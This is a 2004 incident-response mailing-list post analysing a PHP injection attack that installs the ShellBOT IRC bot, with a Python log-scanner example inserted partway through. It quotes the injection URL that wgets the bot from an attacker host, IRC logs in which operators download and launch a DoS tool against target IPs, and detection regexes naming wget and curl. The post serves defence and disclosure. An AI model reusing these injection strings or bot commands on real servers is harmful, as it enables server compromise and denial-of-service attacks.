Security Incidents mailing list archives

Systems compromised with ShellBOT perl script - part 2


From: Kirby Angell <kangell () alertra com>
Date: Fri, 03 Sep 2004 18:37:52 -0500


(note: This is a follow-up to "Systems compromised with ShellBOT perl
script" posted on 20040901)

Introduction
------------

Two days ago we detected a strange Referer entry in our web logs.  This
morning we got almost the same Referer again:

http://www.DOMAIN.com/index.php?id=http://members.lycos.co.uk/gookboy/hkz.txt?&cmd=cd%20/tmp;wget%20http://members.lycos.co.uk/gookboy/.egg2

Attacking IP is still 63.227.76.25.  Attack involves servers, probably
PHP, that do not properly sanitize variables and can be tricked into
executing shell commands.  The attack downloads and executes a Perl
script (.egg2).  The Perl script sets its process name to "[httpd]" to
help it blend into the Apache threads.  It connects to an IRC channel:

Server: irc.mzima.net:6667
Channel: #brdata (note: new channel from last time)
Nickname: goober+random int

The script listens for private messages that can instruct it to do
simple portscans, DOS attacks, and execute shell commands with whatever
permissions the web server has.
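An added example, not from the original post: a small Python scanner that checks the request URI and the Referer of Apache combined-format log lines for the two indicators seen above, a remote URL passed as a PHP parameter value (remote file inclusion) and shell commands such as `cd /tmp;wget` in a parameter. The log lines are constructed for the example; the Referer on the first line is the one quoted in the post.

```python
import re
from urllib.parse import urlsplit, unquote

# Constructed sample lines in Apache "combined" format. The Referer on the
# first line is the one quoted in the post; the second line is benign.
SAMPLE_LOG = """\
63.227.76.25 - - [03/Sep/2004:08:12:01 -0500] "GET / HTTP/1.0" 200 1234 "http://www.DOMAIN.com/index.php?id=http://members.lycos.co.uk/gookboy/hkz.txt?&cmd=cd%20/tmp;wget%20http://members.lycos.co.uk/gookboy/.egg2" "Mozilla/4.0"
192.0.2.10 - - [03/Sep/2004:08:13:44 -0500] "GET /index.php?id=42 HTTP/1.1" 200 5678 "http://www.example.com/" "Mozilla/5.0"
198.51.100.7 - - [03/Sep/2004:08:15:09 -0500] "GET /index.php?id=http://198.51.100.7/x.txt? HTTP/1.0" 200 90 "-" "Wget"
"""

# ip ident user [date] "METHOD path proto" status bytes "referer" "agent"
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "\S+ (\S+) [^"]*" \d+ \S+ "([^"]*)" "[^"]*"$')
# A parameter value that is itself a URL: the classic PHP include() injection.
REMOTE_URL = re.compile(r'^(?:https?|ftp)://', re.I)
# Shell-ish tokens inside a parameter value (after ; & | or whitespace), or /tmp.
SHELL_CMD = re.compile(r'(?:^|[;&|\s])(?:wget|curl|lynx|fetch|chmod|perl|sh)\b|/tmp/?', re.I)

def query_params(url):
    """Split the query string manually on '&' so ';' inside a value survives."""
    query = urlsplit(url).query
    for part in query.split("&"):
        if part:
            name, _, value = part.partition("=")
            yield unquote(name), unquote(value)

def inspect_url(url):
    """Return the set of indicator names found in one URL's parameters."""
    hits = set()
    for _, value in query_params(url):
        if REMOTE_URL.match(value):
            hits.add("remote-url-in-parameter")
        if SHELL_CMD.search(value):
            hits.add("shell-command-in-parameter")
    return hits

def scan_log(text):
    """Return (client_ip, field, indicators) for each suspicious log line."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        ip, _, path, referer = m.groups()
        for field, url in (("request", path), ("referer", referer)):
            hits = inspect_url(url)
            if hits:
                findings.append((ip, field, sorted(hits)))
    return findings

if __name__ == "__main__":
    for ip, field, hits in scan_log(SAMPLE_LOG):
        print(ip, field, ", ".join(hits))
```

Both the request line and the Referer are checked because, as in this incident, the injected URL can show up in either field depending on which server the attacker's fetch hits.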

This time I was more prepared and have gathered more data on the script
and what the bad guys are using it for.  I have packaged the data into a
.tar.gz file if anyone wants a copy of the whole thing including scripts.

Setup
------------

I modified the .egg2 script to neuter its portscan and DOS functions.
The functions are still there, but they don't actually make any
connections to remote servers.  A "sleep" command attempts to make it
look like something happened though.  I purposefully left the shell
command functional so I could see what commands they would run and not
have them get too suspicious.

The script was put into a VMWare session with a RH9 install.  iptables
was configured to allow outgoing 6667:tcp and to disallow just about
everything else inbound and outbound.  tcpdump was set up to capture all
the traffic on the vmnet ethernet adapter outside of the VMWare session.

Results
-------------
For several hours my rogue bot was undetected and captured at least one
attempt to enlist it along with all the rest (not as many as last time;
but several I notified 2 days ago) in an attack on a computer.  Here is
a summary of the private messages my bot received and responses (entries
prefaced with -> are commands coming into the bot and those with <- are
responses leaving the bot):

-> :^sly!~ssly () cedar invision net PRIVMSG #brdata :!atrix killall -9 doze4
<- PRIVMSG #brdata :doze4: no process killed
-> :^sly!~ssly () cedar invision net PRIVMSG #brdata :!atrix cd /tmp
-> :sly36!~ssly () ns30111 ovh net PRIVMSG #brdata :!atrix rm doze4
<- PRIVMSG #brdata :rm: cannot lstat `doze4': No such file or directory
-> :sly36!~ssly () ns30111 ovh net PRIVMSG #brdata :!atrix wget http://members.lycos.co.uk/gookboy/doze4
<- PRIVMSG #brdata :--13:52:35--  http://members.lycos.co.uk/gookboy/doze4
<- PRIVMSG #brdata :           => `doze4'
<- PRIVMSG #brdata :Resolving members.lycos.co.uk... done.
<- PRIVMSG #brdata :Connecting to members.lycos.co.uk[212.78.204.20]:80... failed: Connection refused.
-> :sly36!~ssly () ns30111 ovh net PRIVMSG #brdata :!atrix chmod +x doze4
<- PRIVMSG #brdata :chmod: failed to get attributes of `doze4': No such file or directory
-> :sly36!~ssly () ns30111 ovh net PRIVMSG #brdata :!atrix ./doze4 81.29.36.147 53 www.ibm.com
-> :sly36!~ssly () ns30111 ovh net PRIVMSG #brdata :!atrix killall -9 doze4
-> :sly36!~ssly () ns30111 ovh net PRIVMSG #brdata :!atrix ./doze4 65.248.51.13 53 www.ibm.com
<- PRIVMSG #brdata :sh: line 1: ./doze4: No such file or directory

So the command sequence is: kill our program, delete our program, get a new
version of our program, instruct our program to attack.

In hindsight it was a mistake to not allow outgoing connections to at
least their Lycos server.  It drew attention to me and a few hours
later, before any other attacks were tried, I was booted and the channel
locked again.

Unfortunately it means that the IP address I used is now probably dead
for recon on this attacker.  I think they are unaware how I keep finding
the channel they are using though.  If I get another shot, I'll see if I
can bounce the connection through another machine using an SSH tunnel.
If someone wants to volunteer a computer for this purpose it would be
most appreciated.

doze4
------------
I downloaded the "doze4" program and found it to be an elf binary.
Google didn't turn up the source code, but I have disassembled it.  I'm
not one with Linux assembly language but it's not terribly long and seems
to be a pretty basic DOS app.  Not terribly sure why they didn't just
use the one built into the script, but there is probably a good reason.
doze4 identifies itself as:

* * doze4 - written by phyton
* * doze4 rOckz! evite hosts.. use ips!
Usage: %s <ip> <porta> <spoof>
<ip>     : endereço que deseja f***r. (address that it desires to f***r)
<porta>  : porta aperta  (coloque 0, que é rOckz) (door presses (places
0, that he is rOckz))
<spoof>  : um ip para ser spoofado (sua mascara). (a to be spoofado IP
(its masks))

doze4 as well as .egg2 was written by someone who speaks Portuguese.

Summary
-------------
The same IP was used to initiate the attack both times.  I notified the
owner of that IP yesterday, but never received a response.  Tonight I
will be going through the list of compromised machines and notifying as
many as possible of the problem.

The files:

doze4           elf binary of DOS tool
doze4.asm       disassembled version of doze4
wget-doze4.cap  tcpdump capture of IRC session
egg2-live       dangerous version of IRC bot
egg2-neutered   egg2 with portscan and DOS disabled
                (but SHELL access is still live)
hkz.txt         PHP injection script
irclog.txt      text output of IRC connection
readme.txt      this file

are available in a .tar.gz file for anyone who requests it.  Tuesday
night my test server was attacked with a SYN flood; I expect worse this
time so I've locked it down so it will just log everything.  We don't
put this kind of thing on our production web servers, so just shoot me
an email at kangell () alertra com if you want the archive.

--
Thank you,

Kirby Angell
Get notified anytime your website goes down!
http://www.alertra.com
key: 9004F4C0
fingerprint: DD7E E88D 7F50 2A1E 229D  836A DB5B A751 9004 F4C0

